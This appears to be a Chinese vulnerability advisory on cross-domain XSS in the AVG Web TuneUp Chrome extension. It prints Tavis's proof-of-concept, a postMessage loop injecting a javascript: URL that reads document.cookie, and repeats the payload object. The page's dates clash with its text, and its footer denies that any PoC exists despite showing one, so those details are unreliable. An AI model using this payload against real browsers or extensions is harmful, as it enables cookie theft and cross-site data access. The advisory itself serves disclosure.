Google浏览器AVG Web TuneUp插件XSS漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

今年8月15日, 来自project zero的成员Tavis提交了谷歌浏览器插件 AVG Web TuneUp的多个漏洞,由于该插件活跃用户约900万,所以影响范围非常广。 这个插件添加了很多的api用来操作谷歌浏览器,比如可以轻易的劫持搜索框和新标签页。而由于其安装过程十分复杂,所以能够逃避谷歌恶意软件的检查,特别是能够逃避谷歌浏览器“阻止滥用扩展的API”的检查。 事实上其中的很多api是有问题的,攻击者可以通过构造payload成功盗取用户在avg.com上的cookie,还可以获取用户的浏览记录以及其他的私人数据,甚至有可能成功实施任意命令执行。 攻击手法: Tavis在给厂商的邮件中列举了几种攻击手法:"navigate" API 将会导致一个通用的跨域xss漏洞,attacker.com可以跨域读取访问者的mail.google.com的邮件或者是来自于其他网站的数据。 Tavis所给的poc: ``` <script> for (i = 0; i < 256; i++) { window.postMessage({ origin: "web", action: "navigate", data: { url: "javascript:document.location.hostname.endsWith('.avg.com')" + "?" + "alert(document.domain + ':' +document.cookie)" + ":" + "false", tabID: i }}, "*"); } </script> ``` 通过 window.postMessage(允许跨域通信的javascript api) 不间断的向 AVG: "Web TuneUP”插件发起请求,请求的数据为: ``` { origin: "web", action: "navigate", data: {url:"javascript:document.location.hostname.endsWith('.avg.com')"+ "?"+ "alert(document.domain + ':' +document.cookie)"+ ":"+ "false",tabID: i}} ```...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息